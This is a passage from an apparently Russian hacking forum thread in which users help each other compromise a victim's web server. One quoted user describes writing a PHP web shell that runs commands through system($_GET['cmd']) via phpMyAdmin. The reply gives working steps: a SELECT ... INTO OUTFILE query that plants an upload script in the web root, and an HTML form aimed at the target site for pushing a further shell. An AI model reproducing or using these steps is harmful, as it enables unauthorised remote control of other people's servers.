31.07.2008, 19:56
|
|
Новичок
Регистрация: 24.12.2006
Сообщений: 2
Провел на форуме:
18610
Репутация:
14
|
|
Сообщение от UpsPig
n0ne
Если я правильно понял скрипт должен лежать на стороне жертвы.
Записать что то на черв можно только через shell.php <? system($_GET['cmd']); ?>, который я записал через phpmyadmin из-за того, что нельзя инклудить
Если шел получил через phpmyadmin, то попробуй залить тогда так:
сначала сделай запрос в phpmyadmin:
SELECT '<? move_uploaded_file($userfile, "C:/путь_до_www/name_shell.php"); ?>' into OUTFILE "C:/путь_до_www/uploadshell.php"
///// думаю понятно, что создасться файл uploadshell.php в директории www, который впоследствии и зальёт нам шел под именем name_shell.php
Далее создай простую форму примерно следующего содержания:
PHP код:
<FORM ENCTYPE="multipart/form-data" ACTION="http://site_hack/uploadshell.php" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Ага, отправить вот этот файлик: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
подправь только ACTION и всё....
Желаю удачи 
|
|
|